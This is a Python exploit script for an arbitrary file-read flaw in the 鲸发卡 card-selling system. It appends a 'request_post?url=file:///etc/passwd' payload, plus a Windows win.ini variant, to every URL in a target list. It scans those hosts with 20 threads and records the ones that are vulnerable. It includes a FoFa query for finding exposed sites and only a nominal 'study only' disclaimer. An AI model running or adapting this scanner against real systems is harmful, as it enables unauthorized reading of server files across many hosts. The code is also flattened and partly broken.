!/usr/bin/env python3

import requests
from termcolor import colored
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor, as_completed ,CancelledError
import os
import signal
import sys

print('''

本程序仅用于交流学习使用,任何未经授权的渗透测试都是违法行为

/| __ __ ___ .....
|| | |/ .' . _ _ .-'' '.
|| | .-. .-. ' /\ \ /// .-''"'-. . || __ __ | | | | | | \ //\ /// /\ \
||/' '. .:--.'. | | | | | | _ `// '/ | |
|:/ '. '/ | \ || | | | | | | ' / |\| |/ \ .-------------' || | |" __ | || | | | | |.' | .' | ' \ '-.___...---.
||\ / ' .'.''| ||| || ||/ | / | . .' |/\'..' / / / | |_ | '. | ''-...... -' ' '-' \ \._,\ '/ ' .'| '/ --' " -' `--' https://github.com/bamuwe
''')
print("漏洞名称：鲸发卡系统虚拟卡系统任意文件读取漏洞\n")

for filename in ['urls.txt', 'result.txt']:
if not os.path.exists(filename):
with open(filename, 'w') as f:
print(f"[*] Created successfully {filename}")

print(r'[!] Usage : echo 'http://example.com' > urls.txt && python3 poc.py')
print('[!] FoFa = "/static/theme/maowang51/css/style.css" && status_code="200" && country="CN"')
print()

if not os.path.exists('urls.txt'):
print('urls.txt is empty')
exit(0)

should_stop = False
def signal_handler(sig, frame):
global should_stop
should_stop = True
print("\nInterrupt signal received and trying to stop the program...")
sys.exit(0)

signal.signal(signal.SIGINT, signal_handler)

处理每个目标URL的函数

def process_target(target):
try:
response = requests.get(target)
if response.status_code == 200 and ('root' in response.text or 'for' in response.text):
return target
except requests.RequestException as e:
pass

def main():
global SuccessCount
SuccessCount = 1

with open('urls.txt') as fi:
    targets = [line.strip() + '/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa' for line in fi]
    targets_windows = [line.strip() + '/pay/xinhui/request_post?url=file:///C:/windows/win.ini&post_data[1]=aaa' for line in fi]

pbar = tqdm(total=len(targets + targets_windows), desc='process')

with ThreadPoolExecutor(max_workers=20) as executor:
        futures = []
        for target in targets + targets_windows:
            future = executor.submit(process_target, target)
            future.add_done_callback(lambda p: pbar.update())
            futures.append(future)

        for future in as_completed(futures):
            if should_stop:
                try:
                    future.cancel()
                except CancelledError:
                    pass
                continue
            result = future.result()
            if result:
                pbar.write(colored(f"{SuccessCount}. {result} Vulnerable", 'green'))
                with open('result.txt', 'a') as f:
                    f.write(result + '\n')
                SuccessCount += 1

pbar.close()
print(colored(f"All targets have been processed {SuccessCount-1} vulnerable targets found", 'cyan'))

if name == 'main':
main()